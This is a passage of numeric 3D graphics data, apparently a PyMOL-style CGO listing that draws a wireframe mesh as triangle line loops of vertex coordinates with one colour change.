VERTEX, 9.939, 33.047, 26.708,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.932, 33.170, 26.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.792, 33.280, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.765, 33.244, 26.374,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.621, 33.361, 26.290,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.536, 33.226, 26.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.400, 33.411, 26.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.379, 33.127, 26.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.258, 33.401, 26.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.386, 33.005, 26.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.278, 33.335, 26.724,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.553, 32.930, 26.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.449, 33.254, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.782, 32.948, 26.843,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 9.670, 33.204, 26.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.939, 33.047, 26.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 9.812, 33.215, 26.639,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.792, 33.280, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.648, 33.399, 26.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.621, 33.361, 26.290,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.474, 33.489, 26.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.400, 33.411, 26.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.288, 33.612, 26.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.258, 33.401, 26.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.199, 33.698, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.278, 33.335, 26.724,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.258, 33.694, 26.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.449, 33.254, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.432, 33.605, 26.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.670, 33.204, 26.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.618, 33.481, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.812, 33.215, 26.639,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.708, 33.396, 26.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.648, 33.399, 26.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.533, 33.581, 26.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.474, 33.489, 26.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.356, 33.680, 26.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.288, 33.612, 26.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.215, 33.855, 26.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.199, 33.698, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.191, 34.004, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.258, 33.694, 26.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.299, 34.039, 26.438,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.432, 33.605, 26.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.476, 33.940, 26.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.618, 33.481, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.617, 33.765, 26.501,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.708, 33.396, 26.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.641, 33.616, 26.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.533, 33.581, 26.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.470, 33.770, 25.915,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.356, 33.680, 26.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.293, 33.879, 25.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.215, 33.855, 26.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.193, 34.084, 25.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.191, 34.004, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.228, 34.265, 25.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.299, 34.039, 26.438,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.378, 34.316, 26.146,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.476, 33.940, 26.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.555, 34.208, 26.245,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.617, 33.765, 26.501,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.655, 34.003, 26.218,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.641, 33.616, 26.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.619, 33.822, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.470, 33.770, 25.915,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.472, 33.912, 25.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.293, 33.879, 25.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.297, 34.029, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.193, 34.084, 25.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.226, 34.248, 25.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.228, 34.265, 25.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.302, 34.439, 25.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.378, 34.316, 26.146,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.479, 34.491, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.555, 34.208, 26.245,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.654, 34.374, 25.912,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.655, 34.003, 26.218,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.724, 34.155, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.619, 33.822, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.649, 33.964, 25.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.472, 33.912, 25.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.538, 34.011, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.297, 34.029, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.367, 34.137, 25.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.226, 34.248, 25.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.314, 34.361, 25.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.302, 34.439, 25.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.411, 34.551, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.479, 34.491, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.602, 34.596, 25.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.654, 34.374, 25.912,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.773, 34.470, 25.574,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.724, 34.155, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.826, 34.247, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.649, 33.964, 25.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.729, 34.057, 25.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 9.538, 34.011, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.660, 34.078, 25.040,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.367, 34.137, 25.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.493, 34.213, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.314, 34.361, 25.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.451, 34.438, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.411, 34.551, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.560, 34.624, 25.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.602, 34.596, 25.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.755, 34.659, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.773, 34.470, 25.574,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.922, 34.525, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 9.826, 34.247, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.964, 34.299, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 9.729, 34.057, 25.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.855, 34.114, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 9.660, 34.078, 25.040,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.833, 34.130, 24.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 9.493, 34.213, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.670, 34.272, 24.609,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.451, 34.438, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.635, 34.499, 24.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.560, 34.624, 25.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.747, 34.677, 24.709,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.755, 34.659, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.941, 34.703, 24.829,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 9.922, 34.525, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 10.103, 34.561, 24.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 9.964, 34.299, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 10.139, 34.334, 24.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 9.855, 34.114, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 10.027, 34.156, 24.807,
END,
COLOR, 0.000, 0.863, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 9.833, 34.130, 24.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 10.054, 34.185, 24.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 9.670, 34.272, 24.609,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.897, 34.335, 24.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 9.635, 34.499, 24.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.863, 34.561, 24.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 9.747, 34.677, 24.709,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.973, 34.731, 24.382,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 9.941, 34.703, 24.829,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 10.162, 34.745, 24.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.103, 34.561, 24.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 10.319, 34.595, 24.587,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.139, 34.334, 24.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 10.352, 34.370, 24.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.027, 34.156, 24.807,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 10.243, 34.200, 24.455,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.054, 34.185, 24.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 10.323, 34.266, 23.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 9.897, 34.335, 24.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 10.171, 34.422, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 9.863, 34.561, 24.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 10.136, 34.645, 23.936,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 9.973, 34.731, 24.382,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 10.237, 34.803, 24.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.162, 34.745, 24.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.416, 34.804, 24.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.319, 34.595, 24.587,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.568, 34.647, 24.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.352, 34.370, 24.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.604, 34.425, 24.240,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.243, 34.200, 24.455,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 10.503, 34.267, 24.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 10.323, 34.266, 23.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 10.641, 34.391, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 10.171, 34.422, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 10.493, 34.555, 23.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.136, 34.645, 23.936,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 10.450, 34.770, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.237, 34.803, 24.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.537, 34.912, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.416, 34.804, 24.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.703, 34.897, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 10.568, 34.647, 24.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.850, 34.734, 23.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 10.604, 34.425, 24.240,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.893, 34.518, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 10.503, 34.267, 24.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.806, 34.376, 23.775,
END,
BEGIN, LINE_LOOP,
